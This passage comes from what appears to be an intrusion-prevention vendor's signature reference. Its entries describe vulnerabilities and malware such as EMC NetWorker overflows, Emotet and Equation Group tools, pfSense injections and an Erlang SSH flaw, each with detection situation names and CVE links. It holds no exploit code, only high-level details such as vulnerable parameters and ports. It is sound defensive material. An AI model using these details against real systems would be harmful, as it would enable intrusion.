EMC-Cmcne-Inmservlets.war-Fileuploadcontroller-Arbitrary-File-Upload

About this vulnerability: A vulnerability in EMC Connectrix Manager Converged Network Edition
Risk: Moderate
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Connectrix Manager
Type: Directory Traversal
Description: A code execution vulnerability exists in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the FileUploadController servlet of inmservlets.war when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CS-EMC-Cmcne-Inmservlets.war-Fileuploadcontroller-Arbitrary-File-Upload
References:
CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810
Back to top

EMC-Cmcne-Inmservlets.war-Softwarefileuploadmoreinfoservlet-Directory-Traversal

About this vulnerability: A vulnerability in EMC Connectrix Manager Converged Network Edition
Risk: Moderate
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Connectrix Manager
Type: Directory Traversal
Description: A directory traversal vulnerability exists in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the SoftwareFileUploadMoreInfoServlet of inmservlets.war when processing HTTP requests. A remote unauthenticated attacker can move any files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CSU-EMC-Cmcne-Inmservlets-Softwarefileuploadmoreinfoservlet-Directory-Traversal
References:
CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810
OSVDB-101211
http://www.osvdb.org/101211
Back to top

EMC-Dantz-Retrospect-Backup-Agent-Denial-Of-Service

About this vulnerability: A vulnerability in EMC Retrospect Client
Risk: Moderate
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Retrospect Client
Type: Malfunction
Description: A Denial of Service (DoS) vulnerability exists in the EMC Retrospect Backup agent. This vulnerability is a result of improper handling of specially crafted packets. An unauthenticated remote attacker can exploit this vulnerability to cause the application to terminate, preventing the backups from occurring on that system. Upon processing the crafted message, the Retrospect Backup client agent process terminates. A Retrospect Backup server can no longer connect to the target and perform backup operations. The affected service must be restarted to resume functionality.
Situation: Generic_CS-EMC-Dantz-Retrospect-Backup-Agent-Denial-Of-Service
References:
CVE-2006-0995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0995
BID-16933
http://www.securityfocus.com/bid/16933
Back to top

EMC-Data-Protection-Advisor-Denial-Of-Service

About this vulnerability: A vulnerability in EMC Data Protection Advisor
Risk: Moderate
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Data Protection Advisor
Type: Malfunction
Description: There is a denial of service vulnerability in EMC Data Protection Advisor. The vulnerability is due to a NULL pointer dereference when handling a non-existent password field in a AUTHENTICATECONNECTION message. A remote attacker can exploit this vulnerability by sending specially crafted requests to the vulnerable service. Successful exploitation could result in a denial of service condition.
Situation: Generic_CS-EMC-Data-Protection-Advisor-Denial-Of-Service
References:
OSVDB-80814
http://www.osvdb.org/80814
Back to top

EMC-Data-Protection-Advisor-Static-Credentials-Authentication-Bypass

About this vulnerability: A vulnerability in EMC Data Protection Advisor
Risk: Moderate
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Data Protection Advisor
Type: Malfunction
Description: Hard-coded credentials can be used to authenticate to EMC Data Protection Advisor with administrative privileges.
Situation: HTTP_CS-EMC-Data-Protection-Advisor-Application-Service-Static-Credentials-Authentication-Bypass
References:
CVE-2017-8013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8013
Back to top

EMC-NetWorker-Librpc.dll-Security-Check-Bypass

About this vulnerability: A vulnerability in EMC Legato NetWorker
Risk: Moderate
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Legato NetWorker
Type: Malfunction
Description: A security bypass vulnerability exists in EMC Legato Networker. The vulnerability exists in the portmapper component librpc.dll and is due to insufficient access control when handling portmap requests. Remote unauthenticated attackers can exploit the vulnerability by spoofing a source address as localhost or 127.0.0.1 to register Remote Procedure Call (RPC) services which allows them to eavesdrop on communications. It is also possible for the attackers to cause a Denial of Service condition on the server.
Situation: Shared-UDP_SunRPC-EMC-NetWorker-Librpc.dll-Security-Check-Bypass
References:
CVE-2011-0321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0321
BID-46044
http://www.securityfocus.com/bid/46044
OSVDB-70686
http://www.osvdb.org/70686
Back to top

EMC-NetWorker-Nsrd-Format-String-Remote-Code-Execution

About this vulnerability: A vulnerability in EMC NetWorker
Risk: Moderate
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Legato NetWorker
Type: Format String
Description: A format string vulnerability has been reported in EMC NetWorker. The vulnerability is due to insufficient validation of input to the SunRPC service. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the nsrd SunRPC service. This can result in code execution in the context of the affected service.
Situation: SunRPC_TCP-EMC-NetWorker-Nsrd-Format-String-Remote-Code-Execution
References:
CVE-2012-2288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2288
BID-55330
http://www.securityfocus.com/bid/55330
OSVDB-85116
http://www.osvdb.org/85116
Back to top

EMC-NetWorker-Nsrd-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in EMC NetWorker
Risk: Moderate
First detected in: sgpkg-ips-477-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Legato NetWorker
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in EMC NetWorker. The vulnerability is due to insufficient validation of input to the SunRPC service exposed by the nsrd process. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the nsrd SunRPC service. This can result in code execution in the context of the affected service.
Situation: SunRPC_TCP-EMC-NetWorker-Nsrd-Stack-Buffer-Overflow
References:
CVE-2012-2288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2288
BID-55330
http://www.securityfocus.com/bid/55330
OSVDB-85116
http://www.osvdb.org/85116
Back to top

EMC-NetWorker-Nsrindexd-RPC-Service-Buffer-Overflow

About this vulnerability: A vulnerability in EMC NetWorker
Risk: Moderate
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Legato NetWorker
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in EMC NetWorker, an enterprise level data protection software system. There is an unspecified error in nsrindexd, a service that exposes an RPC interface, that leads to a buffer overflow vulnerability. An attacker can exploit this vulnerability to cause a denial of service or execute arbitrary code in the context of the affected application.
Situation: SunRPC_CS-EMC-NetWorker-Nsrindexd-RPC-Service-Buffer-Overflow
References:
CVE-2012-4607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4607
OSVDB-89054
http://www.osvdb.org/89054
Back to top

EMC-NetWorker-Nsrindexd.exe-Procedure-0x01-Buffer-Overflow

About this vulnerability: A vulnerability in EMC NetWorker
Risk: Moderate
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Legato NetWorker
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in EMC NetWorker. The flaw is due to improper boundary check when processing RPC requests in the nsrindexd.exe. A remote unauthenticated attacker can leverage this vulnerability by sending crafted RPC message to the target host, potentially inject and execute arbitrary code with System level privileges. In a simple attack case, the affected service process will terminate abnormally when the malicious message is processed. In a sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code.
Situation: SunRPC_CS-EMC-NetWorker-Nsrindexd.exe-Procedure-0x01-Buffer-Overflow
References:
CVE-2012-0395
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0395
OSVDB-78553
http://www.osvdb.org/78553
Back to top

EMC-Replication-Manager-Command-Execution

About this vulnerability: An EMC Replication Manager Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Replication Manager
Type: Input Validation
Description: A vulnerability in EMC Replication Manager, versions 2.1 and 2.2, in the irccd.exe service, which allows remote attackers to execute arbitrary commands via the RunProgram function to TCP port 6542.
Situation: Generic_CS-EMC-Replication-Manager-Command-Execution
References:
CVE-2011-0647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0647
BID-46235
http://www.securityfocus.com/bid/46235
OSVDB-70853
http://www.osvdb.org/70853
Back to top

EMC-RepliStor-Rep_Srv-And-Ctrlservice-Denial-Of-Service

About this vulnerability: A vulnerability in EMC RepliStor
Risk: High
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC RepliStor
Type: Input Validation
Description: A denial of service vulnerability exists in EMC RepliStor. The vulnerability is due to an input validation error while parsing a specially crafted packet sent to 'rep_srv.exe' and 'ctrlservice.exe' services. Remote unauthenticated attackers can exploit this vulnerability by sending a malicious packet to the services on ports 7144/TCP and 7145/TCP. Successful exploitation of this vulnerability would abnormally terminate the targeted service and cause a denial of service condition.
Situation: Generic_CS-EMC-RepliStor-Rep_Srv-And-Ctrlservice-Denial-Of-Service
References:
CVE-2009-3744
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3744
BID-36738
http://www.securityfocus.com/bid/36738
Back to top

EMC-Vmax3-Vasa-Provider-Uploadconfigurator-Directory-Traversal

About this vulnerability: A vulnerability in EMC VMAX3 VASA Provider
Risk: Moderate
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC VMAX3 VASA Provider
Type: Directory Traversal
Description: Invalid validation of the filename parameter causes a directory traversal vulnerability in the Uploadconfigurator functionality in EMC VMAX3 VASA Provider. A successful exploit may allow an attacker to execute arbitrary code on the target server with root privileges.
Situation: HTTP_CS-Vmax3-Vasa-Provider-Uploadconfigurator-Directory-Traversal
References:
CVE-2017-4997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-4997
Back to top

EMF-Windows-Graphics-Rendering-Engine-BOF

About this vulnerability: Buffer overflow in Windows Graphics Rendering Engines emf/wmf parsing
Risk: High
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Windows Graphics Rendering Engine
Type: Buffer Overflow
Description: Windows Graphics Rendering Engine suffers from a buffer overflow vulnerability in the parsing of EMF/WMF metafiles. By tricking a victim into viewing a malicious emf/wmf-image with an application that uses the vulnerable functions, including Internet Explorer, or browsing a folder where the file exists with image thumbnails turned on, the vulnerability can be exploited to execute arbitrary code.
Situation: HTTP_EMF-Windows-Graphics-Rendering-Engine-BOF
HTTP_EMF-Windows-Graphics-Rendering-Engine-BOF-2
File-Binary_EMF-Windows-Graphics-Rendering-Engine-BOF
File-Binary_EMF-Windows-Graphics-Rendering-Engine-BOF-2
References:
CVE-2004-0209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0209
BID-11375
http://www.securityfocus.com/bid/11375
MS04-032
http://technet.microsoft.com/security/bulletin/MS04-032
Back to top

Emotet-Banking-Malware

About this vulnerability: Activity related to Emotet malware
Risk: High
First detected in: sgpkg-ips-894-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Emotet is a trojan mainly used to target financial service providers.
Situation: HTTP_CHS-Emotet-Host-In-HTTP
Back to top

Emotet-Download-Page

About this vulnerability: Emotet download page was detected
Risk: High
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Emotet download page was detected.
Situation: File-Text_Emotet-Download-Page
Back to top

Emotet-Malware-Infection-Traffic

About this vulnerability: Emotet malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1268-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Emotet malware infection traffic was detected.
Situation: HTTP_CS-Emotet-Malware-Infection-Traffic
Back to top

Enalean-Tuleap-Remote-PHP-Code-Injection-Vulnerability

About this vulnerability: Enalean Tuleap Remote PHP Code Injection Vulnerability.
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Enalean Tuleap
Type: PHP Injection
Description: A underialize() function vulnerability in Enalean Tuleap, versions before 7.7, which allows remote attackers to execute arbitrary PHP code due to the lack of user input sanitization.
Situation: HTTP_CRL-Enalean-Tuleap-Remote-PHP-Code-Injection-Vulnerability
References:
CVE-2014-8791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8791
BID-71335
http://www.securityfocus.com/bid/71335
Back to top

Encoded-Crlf-Sequence

About this vulnerability: A percent-encoded CRLF sequence in URI
Risk: Moderate
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Metacharacter Injection
Description: Percent-encoded CRLF sequence in URI may indicate a header injection attack against vulnerable web servers.
Situation: HTTP_CSU-Encoded-Crlf-Sequence
Back to top

Encoded-JavaScript-Tag-In-PDF

About this vulnerability: Encoded JavaScript tag in PDF detected
Risk: Moderate
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Javascript Injection
Description: An encoded JavaScript tag was found in a PDF file. This may be an attempt to circumvent pattern matching done by security devices.
Situation: HTTP_SS-Encoded-JavaScript-In-PDF
File-PDF_Encoded-JavaScript-Tag-In-PDF
Back to top

Encoded-Stream-Filter-Name-In-PDF

About this vulnerability: Encoded stream filter name in PDF detected
Risk: Moderate
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Javascript Injection
Description: An encoded stream filter name (such as "/F#6c#61#74#65#44#65#63#6f#64e" instead of "/FlateDecode") was found in a PDF file. This may be an attempt to circumvent pattern matching done by security devices.
Situation: File-PDF_Encoded-Stream-Filter-Name-In-PDF
Back to top

Encrypted_Server_Name_Indicator

About this vulnerability: Encrypted Server Name Indicator usage detected
Risk: Low
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: Encrypted Server Name Indicator (ESNI) is an extension to the TLS 1.3 protocol that prevents intercepting the TLS Server Name Indicator (SNI) extension. The SNI extension can be used to determine which websites users are visiting.
Situation: TLS_CS-Encrypted_Server_Name_Indicator
Back to top

Endian-Firewall-Proxy-Password-Change-Command-Execution

About this vulnerability: A vulnerability in Endian Firewall
Risk: Moderate
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Endian Firewall
Type: Malfunction
Description: A command injection vulnerability has been reported in Endian Firewall. The vulnerability is due to an input validation error of the NEW_PASSWORD_1 parameter in the chpasswd.cgi script. A remote, authenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the target. Successful exploitation could lead to remote command execution under the security context of the Apache HTTP server process.
Situation: HTTP_CRL-Endian-Firewall-Proxy-Password-Change-Command-Execution
File-Binary_Endian-Firewall-Proxy-Password-Change-Command-Execution
References:
CVE-2015-5082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
Back to top

Energizer-Duo-USB-Charger-Backdoor-Access

About this vulnerability: A backdoor in Energizer Duo USB Charger software
Risk: High
First detected in: sgpkg-ips-293-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Energizer Duo USB Charger
Type: Remote Control
Description: There is a backdoor in the Energizer Duo USB Charger software. This trojan horse software allows complete control of the victim system, including arbitrary code execution.
Situation: Generic_CS-Energizer-Duo-USB-Charger-Backdoor-Access
References:
CVE-2010-0103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0103
BID-38571
http://www.securityfocus.com/bid/38571
Back to top

Enfal-Malware

About this vulnerability: Enfal malware
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Enfal is Windows malware.
Situation: HTTP_CSU-Enfal-Traffic
Back to top

Enigma2-Webinterface-Remote-Root-File-Disclosure

About this vulnerability: A vulnerability in Enigma2 Webinterface
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Enigma2 Webinterface
Type: Malfunction
Description: There is a directory traversal vulnerability in Enigma2 Webinterface which allows remote attackers to read arbitrary files.
Situation: HTTP_CRL-Enigma2-Webinterface-Remote-Root-File-Disclosure
References:
CVE-2012-1024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1024
OSVDB-78999
http://www.osvdb.org/78999
Back to top

EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in EnjoySAP
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EnjoySAP
Type: Malfunction
Description: There is a buffer overflow vulnerability in EnjoySAP, a graphical user interface for SAP. The vulnerability is due to lack of input validation while processing user-supplied parameters for kwedit ActiveX control.
Situation: HTTP_EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow
File-Text_EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-3605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3605
BID-24772
http://www.securityfocus.com/bid/24772
OSVDB-37690
http://www.osvdb.org/37690
Back to top

EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in EnjoySAP
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EnjoySAP
Type: Malfunction
Description: There is a buffer overflow vulnerability in EnjoySAP, a graphical user interface for SAP. The vulnerability is due to lack of input validation while processing user-supplied parameters for the rfcguisink ActiveX control.
Situation: HTTP_EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow
File-Text_EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-3606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3606
BID-24777
http://www.securityfocus.com/bid/24777
OSVDB-37689
http://www.osvdb.org/37689
Back to top

Enterasys-Network-Management-Suite-Syslog-Stack-Based-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in Enterasys Network Management Suite detected
Risk: High
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Enterasys
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in the Syslog service of Enterasys Network Management Suite, before 4.1.0.80, which allows remote attackers to execute arbitrary code via a long PRIO message field.
Situation: Generic_UDP-Enterasys-Network-Management-Suite-Syslog-Stack-Based-Buffer-Overflow
References:
CVE-2011-5227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5227
BID-51124
http://www.securityfocus.com/bid/51124
OSVDB-77971
http://www.osvdb.org/77971
Back to top

EnterpriseDB-Postgres-Plus-Advanced-Server-Authentication-Bypass

About this vulnerability: A vulnerability in EnterpriseDB Postgres Plus Advanced Server
Risk: High
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: EnterpriseDB Postgres Plus Advanced Server
Type: Malfunction
Description: An authentication bypass vulnerability exists in the DBA Management Server component of EnterpriseDB Postgres Plus Advanced Server.
Situation: HTTP_CSU-EnterpriseDB-Postgres-Plus-Advanced-Server-Authentication-Bypass
Back to top

Enterprisedt-Completeftp-Server-Httpfile-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in EnterpriseDT CompleteFTP Server
Risk: Moderate
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Platform: Generic
Software: EnterpriseDT CompleteFTP Server
Type: Input Validation
Description: An arbitrary file deletion vulnerability has been reported in EnterpriseDT CompleteFTP Server. The vulnerability is due to a flaw in HttpFile class. An unauthenticated remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation would allow an attacker to delete arbitrary files with SYSTEM privileges.
Situation: HTTP_CS-Enterprisedt-Completeftp-Server-Httpfile-Arbitrary-File-Deletion
References:
CVE-2022-2560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2560
Back to top

Envoy-HTTP-Url-Path-Access-Control-Bypass

About this vulnerability: A vulnerability in Envoy Envoy
Risk: Moderate
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Platform: Generic
Software: Envoy
Type: Input Validation
Description: There exists an access control bypass vulnerability in Envoy. Successful exploitation could lead in the bypassing of access control filters for restricted paths.
Situation: HTTP_CSU-Envoy-HTTP-Url-Path-Access-Control-Bypass
References:
CVE-2021-29492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29492
Back to top

EQGRP-Tools

About this vulnerability: Tools associated with the Equation Group (EQGRP)
Risk: High
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: The Equation Group is a threat actor which was originaly discovered in 2015. The tools associated with the EQGRP have been since publicly disclosed by a hacking group calling itself "The Shadow Brokers".
Situation: File-Binary_EQGRP-noclient
File-Binary_EQGRP-Durablenapkin.Solaris.2.0.1.1
File-Text_EQGRP-installdate.pl
File-Exe_EQGRP-teflondoor.exe
File-Exe_EQGRP-teflonhandle.exe
File-Exe_EQGRP-EternalBlue-2.2.0.exe
File-Exe_EQGRP-Eternalchampion
File-Exe_EQGRP-Eternalsynergy
File-Exe_EQGRP-Eternalromance
Back to top

Eramba-Authenticated-Remote-Code-Execution-Module-CVE-2023-36255

About this vulnerability: A vulnerability in Eramba
Risk: Moderate
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Platform: Unix;Linux
Software: Eramba
Type: Input Validation
Description: A vulnerability in Eramba, versions before 3.19.1, which allows remote attackers to execute arbitrary commands on the target system via the path parameter in a request to /settings/download-test-pdf.
Situation: HTTP_CSU-Eramba-Authenticated-Remote-Code-Execution-Module-CVE-2023-36255
References:
CVE-2023-36255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36255
Back to top

Ericom-AccessNow-Server-Buffer-Overflow

About this vulnerability: Ericom AccessNow Server insecure usage of vsprintf
Risk: High
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3;Windows 2003 SP2
Software: Ericom AccessNow
Type: Buffer Overflow
Description: A vulnerability in Ericom AccessNow Server consisting of an insecure usage of vsprintf which allows a remote attacker to perform a buffer overflow with a malformed HTTP request.
Situation: HTTP_CSU-Ericom-AccessNow-Server-Buffer-Overflow
References:
CVE-2014-3913
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3913
BID-67777
http://www.securityfocus.com/bid/67777
OSVDB-107674
http://www.osvdb.org/107674
Back to top

Erlang-OTP-SSH-Library-Unauthenticated-Remote-Code-Execution-CVE-2025-32433

About this vulnerability: A vulnerability in the Erlang/OTP SSH library
Risk: Critical
First detected in: sgpkg-ips-1869-5242
Last changed: sgpkg-ips-1869-5242
Platform: Generic
Software: Erlang OTP
Type: Malfunction
Description: A flaw in the SSH protocol message handling allows unauthenticated remote code execution in Erlang/OTP SSH library versions before OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.
Situation: SSH_Erlang-OTP-SSH-Library-Unauthenticated-Remote-Code-Execution-CVE-2025-32433
References:
CVE-2025-32433
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32433
Back to top

Es-File-Explorer-Open-Port

About this vulnerability: A vulnerability in ES File Explorer
Risk: High
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ES File Explorer
Type: Insecure Configuration
Description: A vulnerability in ES File Explorer, version 4.1.9.5.1, which allows remote attackers to read arbitrary files and execute applications via TCP port 59777. After using the ES application once the port will remain open and vulnerable.
Situation: HTTP_CRL-Es-File-Explorer-Open-Port
References:
CVE-2019-6447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6447
Back to top

Esbot-Botnet

About this vulnerability: Esbot botnet
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Espot is an IRC-controlled botnet.
Situation: Generic_CS-Botnet-Esbot-Activity
Back to top

Esf-Pfsense-Cross-Site-Scripting

About this vulnerability: An Esf Pfsense Cross Site Scripting vulnerability
Risk: High
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: A vulnerbility in ESF PfSense, version 2.3.1-RELEASE-p1, which allows remote attackers to execute arbitrary commands in the url, source, user, or virus parameters to squid_clwarn.php.
Situation: HTTP_CSU-Esf-Pfsense-Cross-Site-Scripting
Back to top

Esf-Pfsense-Multiple-Cross-Site-Scripting-Vulnerabilities

About this vulnerability: Multiple vulnerabilities in Electric Sheep Fencing pfSense
Risk: Moderate
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: Multiple cross-site scripting vulnerabilities have been reported in Electric Sheep Fencing pfSense firewall. The vulnerabilites are due to insufficient validation. By convincing a user to visit a malicious website, a remote attacker can exploit the XSS vulnerabilities to execute arbitrary scripts in the user's browser session or gain access to sensitive information.
Situation: HTTP_CRL-Esf-Pfsense-Status_captiveportal-Cross-Site-Scripting
HTTP_CRL-Esf-Pfsense-Firewall_Shaper-Cross-Site-Scripting
HTTP_CRL-Esf-Pfsense-Diag_Logs_Filter-Multiple-Cross-Site-Scripting-Vulnerabilities
HTTP_CRL-Esf-Pfsense-Services_unbound_acls-Cross-Site-Scripting
References:
CVE-2015-2294
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2294
Back to top

Esf-Pfsense-Snort-Snort_log_view.php-Information-Disclosure

About this vulnerability: A vulnerability in Electric Sheep Fencing pfSense Snort
Risk: Moderate
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: An information disclosure vulnerability exists in the pfSense Snort service. The vulnerability is due to insufficient validation of user-supplied input. A remote, authenticated attacker could use this vulnerability to retrieve valuable information from the server. Successful exploitation could lead to information disclosure in the security context of the root user.
Situation: HTTP_CSU-Esf-Pfsense-Snort-Snort_log_view.php-Information-Disclosure
References:
BID-65181
http://www.securityfocus.com/bid/65181
OSVDB-102608
http://www.osvdb.org/102608
Back to top

Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection

About this vulnerability: A vulnerability in Electric Sheep Fencing pfSense
Risk: Moderate
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: Improper parsing of requests to the traffic graph component of pfSense results in a command injection vulnerability, which allows an attacker to gain root-level code execution privileges on the target.
Situation: HTTP_CRL-Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection
File-Text_Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection
Back to top

Esf-Pfsense-Webgui-Deletefile-Directory-Traversal

About this vulnerability: A vulnerability in Electric Sheep Fencing pfSense
Risk: High
First detected in: sgpkg-ips-644-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PfSense
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Electric Sheep Fencing pfSense firewall. This vulnerability is due to insufficient validation of the deletefile HTTP request parameter in "/system_firmware_restorefullbackup.php". By convincing an authenticated user to click on a crafted link, a remote attacker can exploit this vulnerability to delete arbitrary files on the target system with root privileges.
Situation: HTTP_CRL-Esf-Pfsense-Webgui-Deletefile-Directory-Traversal
References:
CVE-2015-2295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2295
OSVDB-119219
http://www.osvdb.org/119219
Back to top

Esignal-Buffer-Overflow

About this vulnerability: A vulnerability in Interactive Data eSignal
Risk: High
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Interactive Data eSignal
Type: Buffer Overflow
Description: A buffer overflow exists in eSignal, a real-time market data and support tool. The vulnerability allows remote attackers to execute arbitrary code on vulnerable systems. Advanced exploit attempts may cause arbitrary injected code to be executed. This may allow the remote attacker to gain control over the system. Injected code will be executed with the privileges of the user running the eSignal application. A simple exploit attempt will cause the eSignal application to terminate after performing an access violation.
Situation: HTTP_CS-Esignal-Buffer-Overflow
References:
CVE-2004-1868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1868
BID-9978
http://www.securityfocus.com/bid/9978
Back to top

EsteemAudit-Exploit-Tool

About this vulnerability: EsteemAudit Tool
Risk: High
First detected in: sgpkg-ips-924-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: EsteemAudit is an exploit tool released by the Shadow Brokers in April 2017.
Situation: Generic_CS-Remote-Desktop-EsteemAudit-Client-Request
References:
CVE-2017-0176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0176
Back to top

Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in ESTSoft ALZip
